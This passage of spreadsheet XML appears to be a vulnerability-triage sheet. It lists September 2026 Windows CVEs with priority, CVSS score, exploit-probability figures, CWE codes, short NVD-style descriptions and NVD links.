      <c r="T387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69512</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69619</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69623</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69625</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69643</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69681</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69689</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69714</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69717</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-822, CWE-843</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K39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97" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69762</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K39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99" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69777</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69807</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69826</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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02" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69847</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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03" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S403" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="T403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69875</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K404"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04" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S404" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="T404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69876</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr">
        <is>
